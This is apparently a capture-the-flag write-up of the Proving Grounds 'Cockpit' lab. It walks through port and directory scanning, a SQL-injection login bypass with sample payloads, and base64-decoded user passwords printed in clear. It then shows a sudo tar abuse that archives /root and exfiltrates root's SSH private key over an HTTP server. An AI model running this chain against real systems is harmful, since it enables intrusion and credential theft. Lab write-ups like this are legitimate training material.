Cockpit - Proving Grounds


Let's start by enumerating all TCP ports with nmap.
nmap -sCV -v -p- --min-rate 1000 -T4
Pasted image 20240917151836.png
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We have SSH(port 22), Apache(port 80) and zeus-admin(port 9090). Let's explore apache server first.

Apache - port 80
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It shows a page with some information about products but nothing interesting here. Let's try to explore zeus-admin now.

Zeus-admin - port 9090
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Gobuster on Apache

Let's start by looking for subdirectories on Apache server.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u -x php -b 404,403
Pasted image 20240917154252.png
I found a login page that i will access.
Pasted image 20240917154459.png
I see a domain wich i will include on /etc/hosts.
echo ' blaze.offsec' | sudo tee -a /etc/hosts
Pasted image 20240917154423.png
Now let's try to access with default credentials wich didn't works.

Check for SQLI on login page

Let's check if there is SQLI vulnerabilities on login page.
1' or 1=1
1' or 1=1
Pasted image 20240917154659.png
Since i have a sql filter i will just try to add ' to username and see what happens.
Pasted image 20240917154813.png
Since we know that this is a MySQL server let's try to look for a bypass paylooad on browser wich we found in this link.
I tried to put 'OR '' = ' on username and it works!
Pasted image 20240917155043.png
I found james and cameron users with base 64 enconded passwords Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI= and dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

Let's decode it.
echo 'Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=' | base64 -d > pass.txt
cat pass.txt
Pasted image 20240917155838.png
echo 'dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy' | base64 -d > pass.txt
cat pass.txt
Pasted image 20240917155713.png
Now we have cameron:thisscanttbetouchedd@455152 and james:canttouchhhthiss@455152 credentials.

Let's check if we can access SSH with this credentials.
ssh james@
Pasted image 20240917155939.png
ssh cameron@
Pasted image 20240917160002.png
Since we don't have public key let's try to login on zeus admin login page.

Login Zeus-admin

Let's access as james.
Pasted image 20240917160136.png
I notice about a terminal panel wich i went there and notice that i have james user in here so let's get user flag for now.
ls -la
Pasted image 20240917160335.png

Privilege Escalation

SUDO - tar

I was looking for root commands that i could use wich i found it.
sudo -l
Pasted image 20240917160542.png
I think this command sudo /usr/bin/tar -czvf /tmp/backup.tar.gz basically keeps information from a directory on /tmp/backup.tar.gz zipped file so let's do it with /root directory.
sudo tar -czvf /tmp/backup.tar.gz /root
Pasted image 20240917161519.png
Since we already got a backup.tar.gz with this information let's start a python server on target machine to transfer this information to our local machine.
python3 -m http.server
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Now let's get root's private key and use it to access as SSH on target machine.
Let's unzip this file and see his content.
tar -xvf backup.tar.gz
cd root
ls -la
Pasted image 20240917162400.png
We can have already root flag in here but let's just try to access with root's private key on ssh.
cd /.ssh
ssh -i id_rsa root@
Pasted image 20240917162501.png
Now that we have a root shell let's find root flag.